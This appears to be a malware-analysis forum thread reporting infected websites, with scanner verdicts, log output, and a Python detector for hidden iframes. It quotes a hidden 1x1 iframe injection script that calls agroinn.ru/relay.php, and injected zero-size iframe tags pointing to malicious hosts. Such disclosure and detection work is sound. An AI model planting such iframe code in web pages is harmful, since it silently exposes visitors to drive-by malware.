Again avast! Web Shield detects malicious website...

See: https://www.virustotal.com/url/cf8aeaa3ab8cee4a2676c2e5d03e3c9f13073eb81ae54ccaf601cc89c543ff05/analysis/
Full report here: http://sitecheck.sucuri.net/results/www.handmall.ru and here: http://urlquery.net/report.php?id=974407

Search results
1.
Гипермаркет handmade

  Warning: Dangerous Downloads
  Посмотреть крупную фотографию: 980 Кб. Муранское стекло Размеры разные, от 16. г. Казань.
  wXw.handmall.ru - Cached
  Visiting it triggers the Webshield to block JS:Blacole-Bu[Expl].

Avast Shields, you cannot go without them,

polonus

But the following non-detected site is questionable, as it was found to be 100% malicious here:
http://zulu.zscaler.com/submission/show/b8ab95f1cb3e28d800fecc2ac11a4caa-1360503638
Blacklisted by both Google Safebrowsing and Yandex,
see: https://www.virustotal.com/url/a55940c07f990affdc067717644d470b3999cb90b3cd7bedacffa72fcfdeba03/analysis/
ALL javascripts should be checked, starting with htxp://mega-rip.ru/js/u.ajaxPm.js & htxp://mega-rip.ru/js/ucodes.ru.ajaxmessages3.js (detection credits go to Redleg's viewer), which lead to a block of obfuscated script after document.write and colour code, which looks suspicious.
Found generator content on ucodes dot ru.ajaxmessages3.js that avast! Webshield blocks as JS:Decode-LI[Trj].

Malicious iFrame on lines 19, 86 and 213; the list of included iFrames also has /abnl/?begun=1&l=US&u0=US%7Ca3kg4CK%7C0%7Cs50 (which is not malware, but benign ad-banner code going to htxp://counter.yadro.ru/hit;ucoznet?r = audistyle code).
For this script at htxp://mega-rip.ru/css/forum_slider.js
I get:

There is no site configured on this address

If you are the owner of the website and continue to see this error after the domain attachment, then the attachment procedure has not been finished. Finish the procedure in the "Domain attachment" section of the Control Panel.

If the domain has just been attached to the site you must wait 15 minutes.

Code hiccup also here:
s50.ucoz dot net/src/uwnd.js?2 benign
[nothing detected] (script) s50.ucoz dot net/src/uwnd.js?2
status: (referer=mega-rip dot ru/forum/13-343-1)saved 228800 bytes 0dd32c2a8c5e705fa396074714324206987bf33a
info: [iframe] s50.ucoz dot net/src/
info: [img] s50.ucoz dot net/src/
info: [img] s50.ucoz dot net/img/1px.gif
info: [input] s50.ucoz dot net/.s/img/1px.gif
info: [img] s50.ucoz dot net/.s/img/1px.gif
info: [decodingLevel=0] found JavaScript
error: undefined variable jQuery
error: undefined variable jQuery.ajaxSettings
error: line:1: SyntaxError: missing ; before statement:
error: line:1: var jQuery.ajaxSettings = 1;
error: line:1: …^
suspicious:
Also consider the 5 potentially suspicious files flagged by Quttera: http://quttera.com/detailed_report/mega-rip.ru

polonus

The malware script (local file request) for the site analyzed in the previous posting, as flagged by the urlquery dot net scan, is:

(function() {
    // create a 1x1 pixel iframe, absolutely positioned at the top-left corner
    var c = document.createElement('iframe');

    c.src = 'htxp://agroinn.ru/relay.php';
    c.style.position = 'absolute';
    c.style.border = '0';
    c.style.height = '1px';
    c.style.width = '1px';
    c.style.left = '1px';
    c.style.top = '1px';

    // inject a container div and attach the hidden iframe to it
    if (!document.getElementById('c')) {
        document.write('<div id=\'c\'></div>');
        document.getElementById('c').appendChild(c);
    }
})();

[The relay.php URL goes to this code here: https://docs.google.com/viewer?url=zasudili.ru/upload/iblock/79e/79ef49ca89c8869c7ff853cc84329308.pdf&embedded=true - Bitrix site management code]

polonus

DrWeb’s online URL scanner gives the site as clean:
Checking:htxp://trane73.ru/demo/blocks/trane73.bcookie.js
File size:1353 bytes
File MD5:acdc79c0b395c427dc31d14ed82d0743

htxp://trane73.ru/demo/blocks/trane73.bcookie.js - archive JS-HTML

htxp://trane73.ru/demo/blocks/trane73.bcookie.js/JSFile_1[0][549] - Ok
htxp://trane73.ru/demo/blocks/trane73.bcookie.js - Ok

Checking:htxp://s50.ucoz.net/src/jquery-1.7.2.js
File size:92.62 KB
File MD5:775b359b36ef251eee59d9c0e291415c

htxp://s50.ucoz.net/src/jquery-1.7.2.js - archive JS-HTML

htxp://s50.ucoz.net/src/jquery-1.7.2.js/JSTag_1[1249a][4ddd] - Ok
htxp://s50.ucoz.net/src/jquery-1.7.2.js - Ok

Checking:htxp://s50.ucoz.net/src/ulightbox/ulightbox.js
File size:21.51 KB
File MD5:f15b616fb905e25c1443c608cbdf2662

htxp://s50.ucoz.net/src/ulightbox/ulightbox.js - Ok

Checking:htxp://u-mrx.addflow.ru/mrx.js?p=2
File size:1006 bytes
File MD5:b4d9eda125d935c47d08a61ebdf6a35c

htxp://u-mrx.addflow.ru/mrx.js?p=2 - archive JS-HTML

htxp://u-mrx.addflow.ru/mrx.js?p=2/JSFile_1[0][3ee] - Ok
htxp://u-mrx.addflow.ru/mrx.js?p=2 - Ok

Checking:htxp://s50.ucoz.net/src/uwnd.js?2
File size:223.44 KB
File MD5:512fa0f362b02fe6a8eda5b26a3f1bc7

htxp://s50.ucoz.net/src/uwnd.js?2 - archive JS-HTML
htxp://s50.ucoz.net/src/uwnd.js?2 - Ok

Checking:htxp://mega-rip.ru/forum/13-343-1
Engine version:7.0.4.9250
Total virus-finding records:3657097
File size:26.47 KB
File MD5:6245a764efdd648ad4f0d1f70ed87faa

htxp://mega-rip.ru/forum/13-343-1 - archive JS-HTML

htxp://mega-rip.ru/forum/13-343-1/JSTAG_1[301][be] - Ok
htxp://mega-rip.ru/forum/13-343-1/JSTAG_2[e5f][104] - Ok
htxp://mega-rip.ru/forum/13-343-1/JSTAG_3[1ba0][f1] - Ok
htxp://mega-rip.ru/forum/13-343-1/JSTAG_4[1ea4][3c2] - Ok
htxp://mega-rip.ru/forum/13-343-1/JSTAG_5[4fc6][65d] - Ok
htxp://mega-rip.ru/forum/13-343-1/JSTAG_6[575c][3e7] - Ok
htxp://mega-rip.ru/forum/13-343-1/JSTAG_7[5b75][de] - Ok
htxp://mega-rip.ru/forum/13-343-1/JSTAG_8[5fa6][231] - Ok
htxp://mega-rip.ru/forum/13-343-1/JSTAG_9[639b][523] - Ok
htxp://mega-rip.ru/forum/13-343-1/JSEvent_10[fe] - Ok
htxp://mega-rip.ru/forum/13-343-1/JSEvent_11[4b] - Ok
htxp://mega-rip.ru/forum/13-343-1 - Ok

polonus

This one is immediately detected by avast! Webshield as infected with JS:Iframe-AAS[Trj] aka JS/iFrame.YU.2
Iframe fs.src = 'http://www.philchor-nb.de/clk.php'; which is blacklisted: http://sitecheck.sucuri.net/results/www.philchor-nb.de/clk.php
Redirect site has now been cleansed: http://urlquery.net/report.php?id=527529 more recent: http://urlquery.net/report.php?id=778066
See: https://www.virustotal.com/url/43cb932dc524b4fd6bb6aaf813fdaef131b97abc16f613b953cc5d32b4676c1b/analysis/1360528492/
Detected also here: http://urlquery.net/report.php?id=975937
and http://www.avgthreatlabs.com/sitereports/domain/panik-esports.de/

polonus

Here on this site we get 3 IDS alerts: http://urlquery.net/report.php?id=979203
DrWeb URL checker does not alert:
Checking:htxp://ttlad.com/it/right6.htm
Engine version:7.0.4.9250
Total virus-finding records:3659107
File size:1719 bytes
File MD5:96c85fc03b7e10f5c4421ed4c9cf9c1c

htxp://ttlad.com/it/right6.htm - archive JS-HTML

htxp://ttlad.com/it/right6.htm/IFrame_1[36] - Ok
htxp://ttlad.com/it/right6.htm/IFrame_2[37] - Ok
htxp://ttlad.com/it/right6.htm - Ok

The scan does not go deep enough: Risky URLs found in: htxp://ttlad.com/it/right6.htm (Quttera detects suspicious)
VirusWatch gives all instances of malware there as dead…

1: htxp://aaa.77xxmm.cn/new858.htm?075
2: htxp://aaa.1l1l1l.com/error/404.html

Content after the < /html> tag should be considered suspicious.

Line 51:
< if​rame src= htxp://aaa.77xxmm.cn/new858.htm?075 width=0 nAme='7126' heIght=0> < /if​rame> < if​rame src= htxp://aaa.1l1l1l.com/error/404.html width=0 name='7126' heIght=0> < /if​rame>

Note: The if​rame above is loading content from a URL currently flagged by Google and should be removed! Credits for detection go out to Redleg!
Read an article from Dancho Danchev on the SQL injection: http://ddanchev.blogspot.nl/2008/05/malware-domains-used-in-sql-injection.html
Logged here: http://bbs.janmeng.com/viewthread.php?action=printable&tid=817414 (log generated by FreShow)
avast! Webshield detects it as HTML:Iframe-Z[Trj]

I now get 378 broken links for htxp://aaa.77xxmm.cn/new858.htm?075 & htxp://aaa.1l1l1l.com/eRRoR/404.html, all 404 and bad-host links
See: http://www.threatexpert.com/report.aspx?md5=2bf71e2de7f9cfd1b70e37a95d323e6f
http://www.threatexpert.com/report.aspx?md5=09454c8ec9d526121bac9342e7928930

polonus
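A defender-side check for the hidden-iframe pattern seen in the posts above (zero-size frames, mixed-case attribute names such as nAme/heIght, markup appended after the closing html tag), added here as an example and not code from the original posts or any of the scanners mentioned; the sample page and its hostnames are constructed placeholders.

```python
import re
from html.parser import HTMLParser

# Constructed sample page (hosts are placeholders, not the thread's domains): legitimate
# markup ends at </html>; two zero-size iframes with mixed-case attribute names follow it.
SAMPLE_HTML = """<html><body><p>legit content</p>
<iframe src="https://example.org/widget" width="300" height="200"></iframe>
</body></html>
<iframe src=http://attacker.invalid/new858.htm?075 width=0 nAme='7126' heIght=0></iframe>
<iframe src=http://attacker2.invalid/error/404.html width=0 name='7126' heIght=0></iframe>
"""

class IframeCollector(HTMLParser):
    """Records every <iframe> start tag with its position and lower-cased attributes."""
    def __init__(self):
        super().__init__()
        self.iframes = []        # [((line, col), attrs), ...]
        self.html_end = None     # (line, col) of the first </html> end tag, if any

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names, so nAme/heIght are normalised.
        if tag == "iframe":
            self.iframes.append((self.getpos(), dict(attrs)))

    def handle_endtag(self, tag):
        if tag == "html" and self.html_end is None:
            self.html_end = self.getpos()

def _is_zero_size(value):
    """True for width/height values such as 0, 1, 0px, 1px that make a frame invisible."""
    m = re.fullmatch(r"\s*(\d+)(px)?\s*", value or "")
    return bool(m) and int(m.group(1)) <= 1

def find_suspicious_iframes(html):
    """Return [(line, src, reasons)] for iframes that are hidden or placed after </html>."""
    p = IframeCollector()
    p.feed(html)
    p.close()
    findings = []
    for pos, attrs in p.iframes:
        reasons = []
        if _is_zero_size(attrs.get("width")) or _is_zero_size(attrs.get("height")):
            reasons.append("zero-size")
        if re.search(r"display\s*:\s*none|visibility\s*:\s*hidden", attrs.get("style") or "", re.I):
            reasons.append("hidden-by-style")
        if p.html_end is not None and pos > p.html_end:   # tuple compare: after </html>
            reasons.append("after </html>")
        if reasons:
            findings.append((pos[0], attrs.get("src", ""), reasons))
    return findings
```

The legitimate 300x200 frame inside the body is not reported; only the two zero-size frames after the closing tag are.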

Reported unknown_html for this site, see: http://sitecheck.sucuri.net/results/dc11.ru/
It had flash malware recently: http://urlquery.net/report.php?id=994524
line 14 DD_belatedPNG.fix('.png, img'); (see: http://www.avastturkiye.com/pda-edition)
and the corresponding attack code: http://xss.cx/2011/06/20/ghdb/dork-xss-reflected-cross-site-scripting-cwe79-capec86-javascript-injection-example-poc-report-bydcom.htm (scanned with netsparker - online cached example)
Ad tracking by Analytics Tracking Code.

polonus